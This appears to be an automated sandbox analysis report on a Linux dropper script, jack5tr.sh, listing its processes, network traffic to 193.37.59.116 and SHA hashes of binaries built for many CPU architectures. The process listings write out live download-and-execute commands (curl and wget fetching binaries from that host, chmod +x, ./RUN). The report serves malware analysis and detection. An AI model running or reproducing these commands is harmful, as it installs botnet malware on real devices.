/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x arc arm arm5 jack5tr.sh mips mpsl RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 jack5tr.sh mips mpsl RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/ppc]
/usr/bin/cat
[cat ppc]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN spc systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/m68k]
/usr/bin/cat
[cat m68k]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN spc systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN sh4 spc systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]
/tmp/RUN
[./RUN]
Network
| Country | Destination | Domain | Proto |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-4 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-4 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-4 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-4 | udp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
Files
/tmp/x86
| MD5 | c4a3f27654d167d92ac6df60a02b40e2 |
| SHA1 | b1707a6ada4a6538e7595cbbdd2cd3b3d2294166 |
| SHA256 | 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100 |
| SHA512 | ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66 |
/tmp/mips
| MD5 | 038943a024bba0e623ee0fc71c0e9dc4 |
| SHA1 | daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b |
| SHA256 | 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb |
| SHA512 | 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07 |
/tmp/arc
| MD5 | 154506d20dcd8502b3820a2912b697e9 |
| SHA1 | 55c207a1c0aeabc6df6d0307f11a03137139d701 |
| SHA256 | 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c |
| SHA512 | aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112 |
/tmp/x86_64
| MD5 | 74eff98ceea934700653d0c0620419f8 |
| SHA1 | 037df252464667dbcdc6f4fde3ff9043a3b76909 |
| SHA256 | 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89 |
| SHA512 | 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c |
/tmp/mpsl
| MD5 | eba2a5a74d5beba7b9f903cfe07f9796 |
| SHA1 | 012af86b452d7e7f82bbd45b5bbef672d2b25c67 |
| SHA256 | 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea |
| SHA512 | a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be |
/tmp/arm
| MD5 | 6b1fc0e45d31470659fe0e295bc63d4e |
| SHA1 | ce54569f5eefe03f56d5df2df3fe4830b0c9f177 |
| SHA256 | 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22 |
| SHA512 | f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea |
/tmp/arm5
| MD5 | fc7db008f770f37ccb16e8d23f9780ae |
| SHA1 | acd2865df9fec74fdafb227ce3136b715bb998b0 |
| SHA256 | 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db |
| SHA512 | c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c |
/tmp/arm6
| MD5 | d6227412be050807781b974181739db6 |
| SHA1 | 14d20849fc59a62ed7f713afda3d9dda4cc2c850 |
| SHA256 | e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09 |
| SHA512 | 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76 |
/tmp/arm7
| MD5 | d0084c21e35f40b71450406d0298e622 |
| SHA1 | f2ce386f6ba9afdb7f95272ab867c913b0802cd9 |
| SHA256 | 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f |
| SHA512 | 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727 |
/tmp/ppc
| MD5 | 9b27ba0a33c0ecaf4c48bc1fdabf2538 |
| SHA1 | d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266 |
| SHA256 | 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618 |
| SHA512 | 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea |
/tmp/spc
| MD5 | 839129f80935155dff6a2db49753d6a9 |
| SHA1 | d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba |
| SHA256 | 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457 |
| SHA512 | ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3 |
/tmp/m68k
| MD5 | e6391e323b334b1257f36bb2fcb34e25 |
| SHA1 | 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41 |
| SHA256 | 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728 |
| SHA512 | b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958 |
/tmp/sh4
| MD5 | f26f51b05d46bea29bcab58abb1a9ec1 |
| SHA1 | 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf |
| SHA256 | ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466 |
| SHA512 | b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea |
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-29 19:31
Reported
2024-08-29 19:37
Platform
debian12-mipsel-20240221-en
Max time kernel
56s
Max time network
94s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RUN | /tmp/jack5tr.sh | N/A |
| File opened for modification | /tmp/x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ppc | /usr/bin/curl | N/A |
Processes
/tmp/jack5tr.sh
[/tmp/jack5tr.sh]
/usr/bin/curl
[curl -O http://193.37.59.116/x86]
/usr/bin/cat
[cat x86]
/usr/bin/chmod
[chmod +x jack5tr.sh RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-timedated.service-CdXlhk x86]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x jack5tr.sh mips RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-timedated.service-CdXlhk x86]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/arc]
/usr/bin/cat
[cat arc]
/usr/bin/chmod
[chmod +x arc jack5tr.sh mips RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-timedated.service-CdXlhk x86]
/usr/bin/curl
[curl -O http://193.37.59.116/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x arc jack5tr.sh mips RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-timedated.service-CdXlhk x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/mpsl]
/usr/bin/cat
[cat mpsl]
/usr/bin/chmod
[chmod +x arc jack5tr.sh mips mpsl RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x arc arm jack5tr.sh mips mpsl RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x arc arm arm5 jack5tr.sh mips mpsl RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 jack5tr.sh mips mpsl RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/ppc]
/usr/bin/cat
[cat ppc]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN spc systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/m68k]
/usr/bin/cat
[cat m68k]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN spc systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/curl
[curl -O http://193.37.59.116/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN sh4 spc systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]
/tmp/RUN
[./RUN]
Network
| Country | Destination | Domain | Proto |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-5 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-5 | udp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-5 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-5 | udp |
Files
/tmp/x86
| MD5 | c4a3f27654d167d92ac6df60a02b40e2 |
| SHA1 | b1707a6ada4a6538e7595cbbdd2cd3b3d2294166 |
| SHA256 | 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100 |
| SHA512 | ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66 |
/tmp/mips
| MD5 | 038943a024bba0e623ee0fc71c0e9dc4 |
| SHA1 | daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b |
| SHA256 | 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb |
| SHA512 | 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07 |
/tmp/arc
| MD5 | 154506d20dcd8502b3820a2912b697e9 |
| SHA1 | 55c207a1c0aeabc6df6d0307f11a03137139d701 |
| SHA256 | 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c |
| SHA512 | aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112 |
/tmp/x86_64
| MD5 | 74eff98ceea934700653d0c0620419f8 |
| SHA1 | 037df252464667dbcdc6f4fde3ff9043a3b76909 |
| SHA256 | 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89 |
| SHA512 | 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c |
/tmp/mpsl
| MD5 | eba2a5a74d5beba7b9f903cfe07f9796 |
| SHA1 | 012af86b452d7e7f82bbd45b5bbef672d2b25c67 |
| SHA256 | 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea |
| SHA512 | a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be |
/tmp/arm
| MD5 | 6b1fc0e45d31470659fe0e295bc63d4e |
| SHA1 | ce54569f5eefe03f56d5df2df3fe4830b0c9f177 |
| SHA256 | 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22 |
| SHA512 | f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea |
/tmp/arm5
| MD5 | fc7db008f770f37ccb16e8d23f9780ae |
| SHA1 | acd2865df9fec74fdafb227ce3136b715bb998b0 |
| SHA256 | 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db |
| SHA512 | c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c |
/tmp/arm6
| MD5 | d6227412be050807781b974181739db6 |
| SHA1 | 14d20849fc59a62ed7f713afda3d9dda4cc2c850 |
| SHA256 | e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09 |
| SHA512 | 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76 |
/tmp/arm7
| MD5 | d0084c21e35f40b71450406d0298e622 |
| SHA1 | f2ce386f6ba9afdb7f95272ab867c913b0802cd9 |
| SHA256 | 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f |
| SHA512 | 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727 |
/tmp/ppc
| MD5 | 9b27ba0a33c0ecaf4c48bc1fdabf2538 |
| SHA1 | d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266 |
| SHA256 | 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618 |
| SHA512 | 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea |
/tmp/spc
| MD5 | 839129f80935155dff6a2db49753d6a9 |
| SHA1 | d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba |
| SHA256 | 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457 |
| SHA512 | ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3 |
/tmp/m68k
| MD5 | e6391e323b334b1257f36bb2fcb34e25 |
| SHA1 | 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41 |
| SHA256 | 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728 |
| SHA512 | b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958 |
/tmp/sh4
| MD5 | f26f51b05d46bea29bcab58abb1a9ec1 |
| SHA1 | 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf |
| SHA256 | ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466 |
| SHA512 | b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea |
Analysis: behavioral3
Detonation Overview
Submitted
2024-08-29 19:31
Reported
2024-08-29 19:36
Platform
debian9-armhf-20240729-en
Max time kernel
14s
Max time network
16s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RUN | /tmp/jack5tr.sh | N/A |
| File opened for modification | /tmp/arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/m68k | /usr/bin/curl | N/A |
Processes
/tmp/jack5tr.sh
[/tmp/jack5tr.sh]
/usr/bin/wget
[wget http://193.37.59.116/x86]
/usr/bin/curl
[curl -O http://193.37.59.116/x86]
/bin/cat
[cat x86]
/bin/chmod
[chmod +x jack5tr.sh RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mips]
/usr/bin/curl
[curl -O http://193.37.59.116/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x jack5tr.sh mips RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arc]
/usr/bin/curl
[curl -O http://193.37.59.116/arc]
/bin/cat
[cat arc]
/bin/chmod
[chmod +x arc jack5tr.sh mips RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/x86_64]
/usr/bin/curl
[curl -O http://193.37.59.116/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x arc jack5tr.sh mips RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mpsl]
/usr/bin/curl
